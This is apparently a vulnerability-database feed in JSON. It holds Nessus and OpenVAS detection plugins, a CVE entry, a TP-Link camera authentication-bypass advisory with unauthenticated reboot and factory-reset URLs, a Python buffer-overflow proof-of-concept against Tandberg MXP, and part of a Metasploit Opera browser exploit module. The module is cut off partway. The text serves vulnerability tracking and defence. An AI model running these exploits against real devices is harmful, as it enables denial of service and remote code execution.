{"nessus": [{"lastseen": "2019-11-01T02:07:20", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The atalk_recvmsg function in net/appletalk/ddp.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7267)\n\n - fs/f2fs/segment.c in the Linux kernel allows local\n users to cause a denial of service (NULL pointer\n dereference and panic) by using a noflush_merge option\n that triggers a NULL value for a flush_cmd_control data\n structure.(CVE-2017-18241)\n\n - fs/pnode.c in the Linux kernel before 4.5.4 does not\n properly traverse a mount propagation tree in a certain\n case involving a slave mount, which allows local users\n to cause a denial of service (NULL pointer dereference\n and OOPS) via a crafted series of mount system\n calls.(CVE-2016-4581)\n\n - drivers/vhost/net.c in the Linux kernel before 3.13.10,\n when mergeable buffers are disabled, does not properly\n validate packet lengths, which allows guest OS users to\n cause a denial of service (memory corruption and host\n OS crash) or possibly gain privileges on the host OS\n via crafted packets, related to the handle_rx and\n get_rx_bufs functions.(CVE-2014-0077)\n\n - It was found that the fix for CVE-2016-9576 was\n incomplete: the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1534.NASL", "href": "https://www.tenable.com/plugins/nessus/124987", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1534)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124987);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:26\");\n\n script_cve_id(\n \"CVE-2013-7267\",\n \"CVE-2014-0077\",\n \"CVE-2014-2851\",\n \"CVE-2014-3688\",\n \"CVE-2015-1333\",\n \"CVE-2015-1421\",\n \"CVE-2016-0758\",\n \"CVE-2016-10088\",\n \"CVE-2016-10723\",\n \"CVE-2016-4581\",\n \"CVE-2016-5870\",\n \"CVE-2016-6786\",\n \"CVE-2017-1000252\",\n \"CVE-2017-14954\",\n \"CVE-2017-16534\",\n \"CVE-2017-17807\",\n \"CVE-2017-18241\",\n \"CVE-2017-9211\",\n \"CVE-2018-11508\",\n \"CVE-2018-14619\"\n );\n script_bugtraq_id(\n 64739,\n 66678,\n 66779,\n 70768,\n 72356\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1534)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The atalk_recvmsg function in net/appletalk/ddp.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7267)\n\n - fs/f2fs/segment.c in the Linux kernel allows local\n users to cause a denial of service (NULL pointer\n dereference and panic) by using a noflush_merge option\n that triggers a NULL value for a flush_cmd_control data\n structure.(CVE-2017-18241)\n\n - fs/pnode.c in the Linux kernel before 4.5.4 does not\n properly traverse a mount propagation tree in a certain\n case involving 
a slave mount, which allows local users\n to cause a denial of service (NULL pointer dereference\n and OOPS) via a crafted series of mount system\n calls.(CVE-2016-4581)\n\n - drivers/vhost/net.c in the Linux kernel before 3.13.10,\n when mergeable buffers are disabled, does not properly\n validate packet lengths, which allows guest OS users to\n cause a denial of service (memory corruption and host\n OS crash) or possibly gain privileges on the host OS\n via crafted packets, related to the handle_rx and\n get_rx_bufs functions.(CVE-2014-0077)\n\n - It was found that the fix for CVE-2016-9576 was\n incomplete: the Linux kernel's sg implementation did\n not properly restrict write operations in situations\n where the KERNEL_DS option is set. A local attacker to\n read or write to arbitrary kernel memory locations or\n cause a denial of service (use-after-free) by\n leveraging write access to a /dev/sg\n device.(CVE-2016-10088)\n\n - ** DISPUTED ** An issue was discovered in the Linux\n kernel through 4.17.2. Since the page allocator does\n not yield CPU resources to the owner of the oom_lock\n mutex, a local unprivileged user can trivially lock up\n the system forever by wasting CPU resources from the\n page allocator (e.g., via concurrent page fault events)\n when the global OOM killer is invoked. NOTE: the\n software maintainer has not accepted certain proposed\n patches, in part because of a viewpoint that 'the\n underlying problem is non-trivial to\n handle.'(CVE-2016-10723)\n\n - A flaw was found in the way the Linux kernel's ASN.1\n DER decoder processed certain certificate files with\n tags of indefinite length. A local, unprivileged user\n could use a specially crafted X.509 certificate DER\n file to crash the system or, potentially, escalate\n their privileges on the system.(CVE-2016-0758)\n\n - A flaw was found in the way the Linux kernel's Stream\n Control Transmission Protocol (SCTP) implementation\n handled the association's output queue. 
A remote\n attacker could send specially crafted packets that\n would cause the system to use an excessive amount of\n memory, leading to a denial of service.(CVE-2014-3688)\n\n - A use-after-free flaw was found in the way the\n ping_init_sock() function of the Linux kernel handled\n the group_info reference counter. A local, unprivileged\n user could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2014-2851)\n\n - The compat_get_timex function in kernel/compat.c in the\n Linux kernel before 4.16.9 allows local users to obtain\n sensitive information from kernel memory via\n adjtimex.(CVE-2018-11508)\n\n - The cdc_parse_cdc_header() function in\n 'drivers/usb/core/message.c' in the Linux kernel,\n before 4.13.6, allows local users to cause a denial of\n service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted\n USB device. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is unlikely.(CVE-2017-16534)\n\n - A flaw was found in the crypto subsystem of the Linux\n kernel before version kernel-4.15-rc4. The 'null\n skcipher' was being dropped when each af_alg_ctx was\n freed instead of when the aead_tfm was freed. 
This can\n cause the null skcipher to be freed while it is still\n in use leading to a local user being able to crash the\n system or possibly escalate privileges.(CVE-2018-14619)\n\n - The crypto_skcipher_init_tfm function in\n crypto/skcipher.c in the Linux kernel through 4.11.2\n relies on a setkey function that lacks a key-size\n check, which allows local users to cause a denial of\n service (NULL pointer dereference) via a crafted\n application.(CVE-2017-9211)\n\n - kernel/events/core.c in the performance subsystem in\n the Linux kernel before 4.0 mismanages locks during\n certain migrations, which allows local users to gain\n privileges via a crafted application, aka Android\n internal bug 30955111.(CVE-2016-6786)\n\n - The KEYS subsystem in the Linux kernel omitted an\n access-control check when writing a key to the current\n task's default keyring, allowing a local user to bypass\n security checks to the keyring. This compromises the\n validity of the keyring for those who rely on\n it.(CVE-2017-17807)\n\n - A use-after-free flaw was found in the way the Linux\n kernel's SCTP implementation handled authentication key\n reference counting during INIT collisions. A remote\n attacker could use this flaw to crash the system or,\n potentially, escalate their privileges on the\n system.(CVE-2015-1421)\n\n - The waitid implementation in kernel/exit.c in the Linux\n kernel through 4.13.4 accesses rusage data structures\n in unintended cases. This can allow local users to\n obtain sensitive information and bypass the KASLR\n protection mechanism via a crafted system\n call.(CVE-2017-14954)\n\n - It was found that the Linux kernel's keyring\n implementation would leak memory when adding a key to a\n keyring via the add_key() function. 
A local attacker\n could use this flaw to exhaust all available memory on\n the system.(CVE-2015-1333)\n\n - The msm_ipc_router_close function in\n net/ipc_router/ipc_router_socket.c in the ipc_router\n component for the Linux kernel 3.x, as used in Qualcomm\n Innovation Center (QuIC) Android contributions for MSM\n devices and other products, allow attackers to cause a\n denial of service (NULL pointer dereference) or\n possibly have unspecified other impact by triggering\n failure of an accept system call for an AF_MSM_IPC\n socket.(CVE-2016-5870)\n\n - A reachable assertion failure flaw was found in the\n Linux kernel built with KVM virtualisation(CONFIG_KVM)\n support with Virtual Function I/O feature (CONFIG_VFIO)\n enabled. This failure could occur if a malicious guest\n device sent a virtual interrupt (guest IRQ) with a\n larger (>1024) index value.(CVE-2017-1000252)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1534\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5c73d2ac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n 
script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:35:09", "bulletinFamily": "scanner", "description": "dotCMS is 
prone to multiple vulnerabilities.", "modified": "2018-10-25T00:00:00", "published": "2016-07-05T00:00:00", "id": "OPENVAS:1361412562310106116", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106116", "title": "dotCMS Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_dotcms_mult_vuln.nasl 12096 2018-10-25 12:26:02Z asteins $\n#\n# dotCMS Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:dotcms:dotcms\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106116\");\n script_version(\"$Revision: 12096 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 14:26:02 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-05 08:55:18 +0700 (Tue, 05 Jul 2016)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-2355\", \"CVE-2016-3688\", \"CVE-2016-3971\", \"CVE-2016-3972\", \"CVE-2016-4040\",\n \"CVE-2016-4803\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"dotCMS Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dotcms_detect.nasl\");\n script_mandatory_keys(\"dotCMS/installed\");\n\n script_tag(name:\"summary\", value:\"dotCMS is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"dotCMS is prone to multiple vulnerabilities:\n\nA SQL injection attack is possible via the Content REST api if the api is set to allow for anonymous\ncontent saving (which is the shipped default). 
(CVE-2016-2355)\n\nA SQL injection vulnerability allows remote administrators to execute arbitrary SQL commands via the\nc0-e3 parameter to dwr/call/plaincall/UserAjax.getUsersList.dwr. (CVE-2016-3688)\n\nA cross-site scripting (XSS) vulnerability in lucene_search.jsp allows remote authenticated administrators\nto inject arbitrary web script or HTML via the query parameter to c/portal/layout. (CVE-2016-3971)\n\nA directory traversal vulnerability in the dotTailLogServlet allows remote authenticated administrators\nto read arbitrary files via a .. (dot dot) in the fileName parameter. (CVE-2016-3972)\n\nA SQL injection vulnerability in the Workflow Screen allows remote administrators to execute arbitrary\nSQL commands via the orderby parameter. (CVE-2016-4040)\n\nA CRLF injection vulnerability in the send email functionality allows remote attackers to inject arbitrary\nemail headers via CRLF sequences in the subject. (CVE-2016-4803)\");\n\n script_tag(name:\"impact\", value:\"An attacker may access sensitive information in the dotcms database.\");\n\n script_tag(name:\"affected\", value:\"Version 3.3.1 and previous versions.\");\n\n script_tag(name:\"solution\", value:\"Update to 3.3.2 or later versions.\");\n\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-32\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-33\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-34\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-35\");\n script_xref(name:\"URL\", value:\"http://dotcms.com/security/SI-36\");\n\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"3.3.2\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"3.3.2\");\n security_message(port: port, data: report);\n 
exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:13:04", "bulletinFamily": "NVD", "description": "The TP-Link IP Cameras TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G, and possibly other models before beta firmware LM.1.6.18P12_sign6, does not properly restrict access to certain administrative functions, which allows remote attackers to (1) cause a denial of service (device reboot) via a request to cgi-bin/reboot or (2) cause a denial of service (reboot and reset to factory defaults) via a request to cgi-bin/hardfactorydefault.", "modified": "2013-10-04T16:43:00", "id": "CVE-2013-3688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3688", "published": "2013-10-01T19:55:00", "title": "CVE-2013-3688", "type": "cve", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "zdt": [{"lastseen": "2018-04-03T21:43:09", "bulletinFamily": "exploit", "description": "TP-LINK TL-SC3171 IP cameras suffer from an authentication bypass vulnerability.", "modified": "2013-06-14T00:00:00", "published": "2013-06-14T00:00:00", "id": "1337DAY-ID-20886", "href": "https://0day.today/exploit/description/20886", "type": "zdt", "title": "TP-LINK TL-SC3171 Authentication Bypass Vulnerability", "sourceData": "1.Advisory Information\r\nTitle: TP-LINK TL-SC3171 Vulnerability\r\nDate Published: 12/06/2013\r\nDate of last updated: 12/06/2013\r\n\r\n2.Vulnerability Description\r\nThe next vulnerability has been found in this device:\r\n-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250).\r\n\r\n3.Affected Products\r\n-CVE-2013-3688. 
The following product is affected: TP-LINK TL-SC3171\r\nIt\u2019s possible other models are affected but they were not checked.\r\n\r\n4.PoC\r\n4.1.Execute Remote Command bypassing authentication\r\nCVE-2013-3688, Execute Remote Command bypassing authentication.\r\nWe have found that it is possible to reboot this kind of device remotely. The attack vector is the following one:\r\n_____________________________________________________________________________\r\nhttp://xx.xx.xx.xx/cgi-bin/reboot\r\nhttp://xx.xx.xx.xx/cgi-bin/hardfactorydefault\r\n_____________________________________________________________________________\r\n\r\nIn the first one you will get a blank page and you can\u2019t re-login until the device is rebooted.\r\nIn the second one, you will get a victory message and of course, in the next login you should introduce factory settings.\r\n\r\n5.Credits\r\n-CVE-2013-3688, was discovered by Eliezer Varad\u00e9 Lopez, Javier Repiso S\u00e1nchez and Jon\u00e1s Ropero Castillo. \r\n\r\n6.Report Timeline\r\n-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received.\r\n-2013-06-03: Students ask for a reply. \r\n-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version.\r\n-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities.\r\n-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity.\r\n-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different.\r\n-2013-06-06: TP-Link answers confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. 
The beta version is available on the website of TP-Link\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20886"}, {"lastseen": "2018-01-01T03:11:57", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-07-13T00:00:00", "published": "2009-07-13T00:00:00", "id": "1337DAY-ID-6909", "href": "https://0day.today/exploit/description/6909", "type": "zdt", "title": "Tandberg MXP F7.0 (USER) Remote Buffer Overflow PoC", "sourceData": "===================================================\r\nTandberg MXP F7.0 (USER) Remote Buffer Overflow PoC\r\n===================================================\r\n\r\n\r\n#########################################################################################\r\n#\t\t\t\t\t\t\t\t\t\t\t#\r\n# TANDBERG BoF v0.1 - Tandberg MXP F7.0< #\r\n# Buffer Overflow Vulnerability PoC #\r\n# By otokoyama #\r\n# #\r\n# [+] We crash the process FtpCt00 by sending a 251 char string of /x20 commonly #\r\n# known as a blank space.(very simple)\t\t\t\t\t\t#\r\n# [+] The BOF happens due to the system passing all usernames:passwords to a log file. #\r\n# #\r\n# [+] Vendor has fixed THIS in the later releases of its firmware so it is now public. #\r\n# \t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t #\r\n# This is a good vuln due to the system not logging the IP address of the attacker. #\r\n# To be able to tell who was causing this you would need to grab a log from the FW #\r\n# and as TANDBERG does not provide timestamps on their endpoints pre f8.0 #\r\n# you would need to have received a SNMP notification to TMS that the system rebooted #\r\n# and cross reference that with the IP's connecting through the firewall. 
\t\t#\r\n# This is particularly annoying due to the fact that systems reboot all the time\t#\r\n# As endusers are constantly turning them on\\off\t\t\t\t\t#\r\n# At this point the sysadmin goes \"TANDBERG Can we buy an Expressway?\" \t\t#\r\n#\t\t\t\t\t\t\t\t\t\t #\r\n# As far as it goes, creating a connectback shell would be difficult #\r\n# this is mainly due to the process on the Endpoint that detects a memory mismatch #\r\n# and subsequently reboots the system(security measure). #\r\n# #\r\n# To create a successful exploit outside of the DoS #\r\n# you would need to locate the memory address of the process that reboots the system #\r\n# (there might even be a fallback on that) This is generally too cumbersome as #\r\n# this embedded system doesn't do anything fun anyway (why would you want access) #\r\n#\t #\r\n# In saying that, #\r\n# it would be fairly trivial to use the BoF to write something to the memory. #\r\n# you will notice buffer below only generates the exception 0x0200 aka Machine Check. #\r\n# Increasing the char sent to the unit will change that error to exception 0x1100 #\r\n# meaning we are sending the MINIMUM required length to overflow the buffer. #\r\n# I have done the hard work for you! Please email me if you get some encodes. \t\t#\r\n# BTW, This could be done like this: #\r\n# from ftplib import FTP #\r\n# ftp = FTP('ip.addr') #\r\n# ftp.login(' '*251) #\r\n# ftp.quit()....but it's dirty.\t\t #\r\n#\t\t\t\t\t\t #\t\t\r\n# shoutouts:mabus,gso #\r\n#########################################################################################\r\n\r\nimport socket\r\nimport struct\r\nimport time\r\nimport sys\r\n\r\n\r\nbuff='USER '+' '*251+'\\r\\n'\r\n\r\nif len(sys.argv)!=3:\r\n\tprint \"\\n[+] Usage: %s <ip> <port>\"%sys.argv[0]\r\n\tprint \"[-] Example: python poc.py 192.168.1.23 23\\n\" \r\n\tsys.exit(0)\r\n\r\ntry:\r\n\tprint \"[+] Connecting... %s\" %sys.argv[1]\r\n\ts=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\tconnect=s.connect((sys.argv[1],int(sys.argv[2])))\r\n\tprint \"[+] Sending data...\"\r\n\ttime.sleep(1.2)\r\n\ts.send(buff)\r\n\tprint \"[+] Deed Done\"\r\n\ts.recv(1024)\r\n\t\r\nexcept:\r\n\tprint \"[#] Unable to connect\"\r\n\r\n\r\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6909"}], "packetstorm": [{"lastseen": "2016-12-05T22:23:42", "bulletinFamily": "exploit", "description": "", "modified": "2013-06-13T00:00:00", "published": "2013-06-13T00:00:00", "href": "https://packetstormsecurity.com/files/122007/TP-LINK-TL-SC3171-Authentication-Bypass.html", "id": "PACKETSTORM:122007", "type": "packetstorm", "title": "TP-LINK TL-SC3171 Authentication Bypass", "sourceData": "`=========================================================================== \nTP-LINK \n==================================================================== \n=========================================================================== \n \n1.Advisory Information \nTitle: TP-LINK TL-SC3171 Vulnerability \nDate Published: 12/06/2013 \nDate of last updated: 12/06/2013 \n \n2.Vulnerability Description \nThe next vulnerability has been found in this device: \n-CVE-2013-3688. Authentication Bypass Issues(CWE-592) and Execution with Unnecessary Privileges(CWE-250). \n \n3.Affected Products \n-CVE-2013-3688. The following product is affected: TP-LINK TL-SC3171 \nIt\u2019s possible other models are affected but they were not checked. \n \n4.PoC \n4.1.Execute Remote Command bypassing authentication \nCVE-2013-3688, Execute Remote Command bypassing authentication. \nWe have found that it is possible to reboot this kind of device remotely. 
The attack vector is the following one: \n_____________________________________________________________________________ \nhttp://xx.xx.xx.xx/cgi-bin/reboot \nhttp://xx.xx.xx.xx/cgi-bin/hardfactorydefault \n_____________________________________________________________________________ \n \nIn the first one you will get a blank page and you can\u2019t re-login until the device is rebooted. \nIn the second one, you will get a victory message and of course, in the next login you should introduce factory settings. \n \n5.Credits \n-CVE-2013-3688, was discovered by Eliezer Varad\u00e9 Lopez, Javier Repiso S\u00e1nchez and Jon\u00e1s Ropero Castillo. \n \n6.Report Timeline \n-2013-05-31: Students team notifies the TP-Link Customer Support of the vulnerability. No reply received. \n-2013-06-03: Students ask for a reply. \n-2013-06-04: TP-Link answers saying Coresecurity reported this vulnerability before and this has been corrected in a new beta firmware version. \n-2013-06-04: Students answer to the vendor saying that this vulnerability is different from the Coresecurity vulnerabilities. \n-2013-06-05: TP-Link answers saying this vulnerability is the same as the vulnerability reported by Coresecurity. \n-2013-06-05: Students respond by explaining the details of the vulnerability and confirming that the vulnerability is different. \n-2013-06-06: TP-Link answers confirming that the vulnerability is fixed with the latest patch for the reported vulnerabilities generated by Coresecurity. 
The beta version is available on the website of TP-Link \n`\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122007/tplink-bypassescalate.txt"}], "metasploit": [{"lastseen": "2019-11-24T11:22:05", "bulletinFamily": "exploit", "description": "Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code.\n", "modified": "2017-07-24T13:26:21", "published": "2009-08-18T04:53:35", "id": "MSF:EXPLOIT/MULTI/BROWSER/OPERA_CONFIGOVERWRITE", "href": "", "type": "metasploit", "title": "Opera 9 Configuration Overwrite", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n #\n # This module acts as an HTTP server\n #\n include Msf::Exploit::Remote::HttpServer::HTML\n\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::OPERA,\n :ua_maxver => \"9.10\",\n :os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],\n :javascript => true,\n :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself\n :vuln_test => nil,\n })\n\n def initialize(info = {})\n super(update_info(info,{\n 'Name' => 'Opera 9 Configuration Overwrite',\n 'Description' => %q{\n Opera web browser in versions <= 9.10 allows unrestricted script\n access to its configuration page, opera:config, allowing an\n attacker to change settings and potentially execute arbitrary\n code.\n },\n 'License' => BSD_LICENSE,\n 'Author' =>\n [\n 'egypt', # stolen from mpack\n ],\n 'References' =>\n [\n [ 'OSVDB', '66472'],\n ],\n 'Payload' =>\n {\n 'EXITFUNC' => 'process',\n 'Space' => 2048,\n 'DisableNops' => true,\n 'BadChars' => \" \",\n },\n 
'Platform' => %w{ unix },\n 'Targets' =>\n [\n #[ 'Opera < 9.10 Windows',\n #\t{\n #\t\t'Platform' => 'win',\n #\t\t'Arch' => ARCH_X86,\n #\t}\n #],\n [ 'Opera < 9.10 Unix Cmd',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n }\n ],\n ],\n # Not sure when this was disclosed but it's been known since at\n # least March 5, 2007, since that's the release date on the version\n # of mpack I stole this from.\n 'DisclosureDate' => 'Mar 5 2007',\n 'DefaultTarget' => 0\n }))\n end\n\n def on_request_uri(cli, request)\n print_status(\"Got request #{request.uri}\")\n\n case request.uri\n when get_resource\n print_status(\"Sending #{self.name}\")\n content = \"<body><script>\"\n content << generate_evil_js(cli, request)\n content << \"</script></body>\"\n headers = { 'Content-Type' => 'text/html' }\n else\n print_status(\"404ing request for #{request.uri}\")\n send_not_found(cli)\n return\n end\n send_response_html(cli, content, headers)\n\n print_status(\"Done with request #{request.uri}\")\n end\n\n def generate_evil_js(cli, request)\n # There are a bunch of levels of quotes here, so the easiest way to\n # make everything line up is to hex escape the command to run\n p = regenerate_payload(cli).encoded\n send_not_found(cli) && return if not p\n\n shellcode = Rex::Text.to_hex(p, \"%\")\n js = <<ENDJS\nblank_iframe = document.createElement('iframe');\nblank_iframe.src = 'about:blank';\nblank_iframe.setAttribute('id', 'blank_iframe_window');\nblank_iframe.setAttribute('style', 'display:none');\ndocument.body.appendChild(blank_iframe);\nblank_iframe_window.eval(\n \"config_iframe = document.createElement('iframe');\" +\n 